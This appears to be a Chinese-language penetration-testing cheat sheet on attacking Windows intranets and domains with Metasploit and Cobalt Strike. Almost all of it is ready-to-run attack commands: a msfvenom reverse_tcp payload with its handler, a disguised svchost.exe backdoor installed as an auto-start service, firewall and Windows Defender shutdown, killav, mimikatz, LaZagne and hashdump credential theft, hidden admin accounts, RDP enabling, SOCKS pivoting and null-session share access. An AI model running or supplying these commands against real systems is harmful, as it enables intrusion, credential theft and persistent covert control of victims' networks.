內網安全4-Metasploit和Cobaltstrike內⽹域滲透

上傳了webshell以後

1.上傳免殺後門，起一個名字爲svchost.exe 的木馬
2.netsh advfirewall set allprofiles state off 關閉防火牆
3.提權 msf getsystem
4.minikazt 抓取密碼
5.收集密碼⼯具-LaZagne.exe
6.msf執⾏run post/windows/manage/enable_rdp模塊來打開遠程桌⾯；
7.克隆admin
net user guest /active:yes
net user guest tttadmin.Com
net localgroup administrators guest /add
clone.exe guest administrator /clone 克隆admin帳號
8.代理
cs上面：socks4 代理，建⽴了⼀條由攻擊機到web服務器的socks通道，socks的服務端在攻擊機，也是反向代理；
msf上面：端口映射出來
portfwd add -l 7005 -r 172.10.200.20 -p 3389
9.做爲一個服務自啓動
sc create svchost binPath= C:\Windows\System32\shorvt.exe start= auto

 

msf 基本模塊使用

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.164.134 
LPORT=4444 -f exe > shell.exe 
控制端：
use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp 
set lhost 192.168.164.134
set lport 4444
exploit

模塊功能使用

getsystem 常規提權
執⾏run post/windows/manage/enable_rdp模塊來打開遠程桌⾯；
run post/windows/manage/migrate #⾃動進程遷移 
run post/windows/gather/checkvm #查看⽬標主機是否運⾏在虛擬機上 
run post/windows/manage/killav #關閉殺毒軟件 
run post/windows/manage/enable_rdp #開啓遠程桌⾯服務 
run post/windows/manage/autoroute #查看路由信息 
run post/windows/gather/enum_logged_on_users #列舉當前登陸的⽤戶 
run post/windows/gather/enum_applications #列舉應⽤程序 
run post/windows/gather/credentials/windows_autologin #抓取⾃動登陸的⽤戶名和密碼 
run post/windows/gather/smart_hashdump #dump出全部⽤戶的hash run getgui -u hack -p 123
run post/windows/gather/enum_patches 補丁信息 
run post/multi/recon/local_exploit_suggester 查詢可利⽤的漏洞
netsh advfirewall set allprofiles state off #關閉防⽕牆 
run post/windows/gather/enum_patches 補丁信息 
run post/multi/recon/local_exploit_suggester 查詢可利⽤的漏洞

 

meterpreter搭建反向socks4代理

run get_local_subnets #查看路由段 
run autoroute -s 192.168.52.0/24  #添加路由⾄本地 
run autoroute -p #打印當前路由信息

添加路由的⽬的是爲了讓MSF其餘模塊能訪問內⽹的其餘主機，即52⽹段的攻擊流量都經過已滲透的這臺⽬標 主機的meterpreter會話來傳遞。 
添加socks4a代理的⽬的是爲了讓其餘軟件更⽅便的訪問到內⽹的其餘主機的服務。（添加路由⼀定要在掛代 理以前，由於代理須要⽤到路由功能） 
編輯本地的代理服務： vim /etc/proxychains.conf 
例如 socks4 本機ip 1080
而後在msf上開啓開啓代理功能：
use auxiliary/server/socks4a
options
set srvhost 本機ip 
set srvport 1080
jobs //開啓代理
測試：
proxychains nmap -p 1-1000 -Pn -sT 192.168.52.141 # -Pn和-sT必需要有
proxychains是⽆法代理icmp流量的，因此ping是沒有⽤的。

 

MSF派⽣給CS

cs上配置常規的監聽器：beacon http
msf:
meterpreter > background 
msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject # 設置與cs相同的 payload； 
msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http msf5 exploit(windows/local/payload_inject) > set lhost 192.168.10.128
msf5 exploit(windows/local/payload_inject) > set lport 4444 # 設置剛纔得到session 
msf5 exploit(windows/local/payload_inject) > set session 1 
msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true 
msf5 exploit(windows/local/payload_inject) > run

 

cs模塊基本使用

使⽤portscan命令：ip⽹段 — ports端⼝ — 掃描協議（arp、icmp、none）— 線程（實戰不要過⾼）。 
portscan 192.168.52.0/24 445 arp 200

 

創建sokcs代理和listenter

右擊：pivoting 樞紐--->>>sokcs server //創建sokcs代理
pivoting 樞紐--->>>listenter //在目標主機上創建一個監聽器，用於多級代理鏈（我是這樣認爲的，尚未實踐）

View > Proxy Pivots //查看創建的代理
複製參數能夠在msf中使用
msf5 > setg Proxies socks4/5:ip:port #讓msf全部模塊的流量都經過此代理⾛。(setg全局設置) 
msf5 > setg ReverseAllowProxy true #容許反向代理，經過socks反彈shell，建⽴雙向通道。 這⾥ip須要修改成CS服務器的ip。

 

內網常見的一些doc命令：

ipconfig /all 查看本機ip，所在域 
route print 打印路由信息 
net view 查看局域⽹內其餘主機名 
arp -a 查看arp緩存 
net start 查看開啓了哪些服務 
net share 查看開啓了哪些共享 
net share ipc$ 開啓ipc共享 
net share c$ 開啓c盤共享 
net use \\192.168.xx.xx\ipc$ "" /user:"" 與192.168.xx.xx建⽴空鏈接 
net use \\192.168.xx.xx\c$ "密碼" /user:"⽤戶名" 建⽴c盤共享 
dir \\192.168.xx.xx\c$\user 查看192.168.xx.xx c盤user⽬錄下的⽂件 
net config Workstation 查看計算機名、全名、⽤戶名、系統版本、⼯做站、域、登陸域 
net user 查看本機⽤戶列表 
net time /domain #查看時間服務器，判斷主域，主域服務器都作時間服務器 
net user hack hack123 /add 
net localgroup administrator hack /add 
net localgroup "Remote Desktop Users" hack /add 
開啓3389；
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh advfirewall set allprofiles state off #關閉防⽕牆
net stop windefend